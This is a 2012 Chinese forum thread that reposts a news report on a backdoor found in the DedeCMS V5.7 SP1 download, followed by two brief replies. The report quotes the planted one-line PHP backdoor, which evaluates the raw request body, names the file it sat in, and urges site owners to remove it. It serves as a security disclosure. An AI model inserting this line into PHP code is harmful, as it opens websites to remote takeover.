找回密码
 注册
搜索
免费空间 免费域名 免费AI 老牌主机商首月仅1美分!27美元/年!Spaceship优惠码 Namecheap优惠码阿里云2核2G3M新老续费同享99元/年!
查看: 459|回复: 2

[IT资讯] Dedecms 国内著名 PHP 开源免费 CMS 程序被曝植入后门代码,有安全问题。

[复制链接]
发表于 2012-4-22 11:02:32 | 显示全部楼层 |阅读模式
站长之家3月21日报道:昨日,乌云漏洞平台发布最新报告称,著名开源建站软件Dedecms V5.7 SP1正式版被植入后门,通过该后门可成功入侵并控制使用dedecms的网站。

据乌云报告,被植入的后门是在/include/shopcar.class.php文件中,被植入的代码为@eval(file_get_contents(‘php://input’));,乌云介绍称,通过该后门可成功入侵dedecms网站。有网友对植入的该后门予以证实,称其在2012-3-18 19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。

据了解,@eval(file_get_contents(‘php://input’));是将请求的数据流作为脚本语言执行,通过该后门,可以上传PHP后门来控制整个网站。使用Dedecms V5.7 SP1正式版建站的站长,需立即对后门代码进行删除,以保护网站安全。

Dedecms是一款开源建站软件,其最早是由IT柏拉图个人开发,并在2007年进行了公司化运作。目前,国内有不少网站都使用了Dedecms系统,不过在Dedecms创始人IT柏拉图的离开后,Dedecms屡次被曝出安全漏洞问题。截至发稿,Dedecms官方尚未对该漏洞进行任何回应。
 楼主| 发表于 2012-4-22 14:24:57 | 显示全部楼层
回复 2# zap123


    还要5800元商业使用费,呵呵,哎。
发表于 2012-4-24 20:46:30 | 显示全部楼层
不是好久了吗
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|免费吧论坛

GMT+8, 2024-11-27 01:30 , Processed in 0.018495 second(s), 3 queries , Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表